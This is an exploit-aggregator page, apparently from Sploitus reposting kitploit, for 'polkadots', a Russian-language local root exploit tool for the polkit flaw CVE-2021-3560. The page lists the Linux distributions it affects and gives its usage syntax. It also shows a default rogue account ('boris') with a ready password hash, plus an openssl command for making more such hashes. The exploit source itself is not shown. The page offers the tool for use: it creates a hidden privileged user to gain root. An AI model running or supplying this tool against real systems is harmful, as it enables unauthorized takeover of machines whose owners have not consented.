Sploitus

Exploit for polkadots

kitploit · 2026-08-26

Exploit Code

MARKDOWN35 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SWAPRAVO-POLKADOTS
# polkadots

## CVE-2021-3560 Локальный эксплойт для повышения привилегий

##### Этот эксплойт создает нового привилегированного пользователя, с помощью которого можно повысить привилегии до root.

  
Затронутые дистрибутивы:

  * RHEL 8
  * Fedora 21
  * Debian testing (Bullseye)
  * Ubuntu 20.04



### Использование

root@kitploit:~
    
    
    ./polkadots -a [Account] -n [Account name] -h [Password hash] -i [iterations]
    	     Сгенерировать хешированные пароли с помощью: openssl passwd -6 password@123
    
    Параметры по умолчанию:
        -a boris
        -n Boris Ivanovich Grishenko
        -h $6$cGKhfu9znRnOQV1h$2j/3WKyqTcCaftP1PGhW8Pghj2qV5j8zwy1gHrt9eILUE6WKeWVCTa9QgkskIfwVXpjVI.TuX2D.rEkbwKubi/
        -i 20
    

#### Обнаружено: Kevin Backhouse

#### Источник: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/